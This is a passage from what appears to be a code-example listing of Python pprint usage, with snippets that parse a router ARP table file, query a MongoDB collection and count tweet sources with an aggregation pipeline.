     'Internet  10.220.88.20            -   c89c.1dea.0eb6  ARPA   FastEthernet4\n'
     'Internet  10.220.88.21          213   1c6a.7aaf.576c  ARPA   FastEthernet4\n')
"""
from pprint import pprint 

# import the file `show_arp.txt`, convert to a list, remove the header 
with open("show_arp.txt") as f:
    output = f.readlines()

arp_list = output[1:]
pprint(arp_list)

# sort based on IPs; list.sort() sorts in place and returns None, so print the list afterwards
arp_list.sort()
pprint(arp_list)

# create a new list containing the first 3 ARP entries
arp_sliced = arp_list[:3]
pprint(arp_sliced)

# join the new list 
arp_sliced = '\n'.join(arp_sliced)
pprint(arp_sliced)

# write the list out to a file 
with open("arp_entries.txt", "w") as f:
    f.write(arp_sliced)
Example #58
0
    def describe(self):
        pprint.pprint(self.__dict__)
Example #59
0
db.authenticate(name="root", password="******")
qr = pyquery.query(db, "test.coll001")
qr = qr.where(pyfuncs.regex(Fields.fx, "^312313$"))

# qr.project({
#     Fields.Users.username:1,
#     Fields.Users.fullName:pyfuncs.concat(Fields.Users.firstName, " ",Fields.Users.lastname)
# })

# qr=qr+2
#     #.set(x=1,y=2)
# import pprint
# items=list(qr.objects)
import pprint
x = list(qr.objects)
pprint.pprint(list(qr.items))

# ret=qr=pyquery.query(db,"test.coll001").insert(dict(
#     name=1
# ),dict(
#     fx="312313"
# )).commit()
# print ret
# qr=pyquery.query(db,"test").lookup(
#     From="ddd",
#     locaField="vvv",
#     foriegbField="ggg",
#     alias="ggg"
#
# ).lookup(
#     From="bbb",
Example #60
0
def make_pipeline():
    # complete the aggregation pipeline
    pipeline = [{
        "$group": {
            "_id": "$source",
            "count": {
                "$sum": 1
            }
        }
    }, {
        "$sort": {
            "count": -1
        }
    }]

    return pipeline


def tweet_sources(db, pipeline):
    result = db.tweets.aggregate(pipeline)
    return result


if __name__ == '__main__':
    db = get_db('twitter')
    pipeline = make_pipeline()
    result = tweet_sources(db, pipeline)
    import pprint
    pprint.pprint(result)